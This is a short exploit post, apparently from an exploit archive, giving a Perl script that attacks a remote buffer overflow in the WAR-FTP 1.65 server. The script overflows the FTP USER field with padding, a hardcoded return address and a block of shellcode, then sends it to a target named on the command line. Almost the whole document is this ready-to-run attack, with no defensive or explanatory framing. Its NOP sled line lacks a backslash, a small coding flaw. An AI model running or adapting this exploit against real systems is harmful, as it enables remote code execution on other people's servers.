|
# Exploit Title:WAR-FTP Remote Buffer Overflow Exploit
# Date: 20/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.com
# Email: Angel-Injection[at]hotmail.com
# Version:1.65
# Category:[Remote]
---------------------- Exploit Code --------------------------
#!/usr/bin/perl
use Net::FTP;
($target) = @ARGV;
if(@ARGV !=1){
print "Usage : Target";
}
else{
$user = "\x41" x 485;
$ret = "\x5D\x38\x82\x7C";
$nop = "x90" x 10;
$shellcode =
"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xdc\x37\x95\x96\x83\xee\xfc\xe2\xf4\x20\xdf\x1c\x96" .
"\xdc\x37\xf5\x1f\x39\x06\x47\xf2\x57\x65\xa5\x1d\x8e\x3b" .
"\x1e\xc4\xc8\xbc\xe7\xbe\xd3\x80\xdf\xb0\xed\xc8\xa4\x56" .
"\x70\x0b\xf4\xea\xde\x1b\xb5\x57\x13\x3a\x94\x51\x3e\xc7" .
"\xc7\xc1\x57\x65\x85\x1d\x9e\x0b\x94\x46\x57\x77\xed\x13" .
"\x1c\x43\xdf\x97\x0c\x67\x1e\xde\xc4\xbc\xcd\xb6\xdd\xe4" .
"\x76\xaa\x95\xbc\xa1\x1d\xdd\xe1\xa4\x69\xed\xf7\x39\x57" .
"\x13\x3a\x94\x51\xe4\xd7\xe0\x62\xdf\x4a\x6d\xad\xa1\x13" .
"\xe0\x74\x84\xbc\xcd\xb2\xdd\xe4\xf3\x1d\xd0\x7c\x1e\xce" .
"\xc0\x36\x46\x1d\xd8\xbc\x94\x46\x55\x73\xb1\xb2\x87\x6c" .
"\xf4\xcf\x86\x66\x6a\x76\x84\x68\xcf\x1d\xce\xdc\x13\xcb" .
"\xb6\x36\x18\x13\x65\x37\x95\x96\x8c\x5f\xa4\x1d\xb3\xb0" .
"\x6a\x43\x67\xc7\x20\x34\x8a\x5f\x33\x03\x61\xaa\x6a\x43" .
"\xe0\x31\xe9\x9c\x5c\xcc\x75\xe3\xd9\x8c\xd2\x85\xae\x58" .
"\xff\x96\x8f\xc8\x40\xf5\xbd\x5b\xf6\xb8\xb9\x4f\xf0\x96";
$send = $user.$ret.$nop.$shellcode;
my $ftp = Net::FTP->new($target);
$ftp->login($send,"123456789");
$ftp->quit;
}
|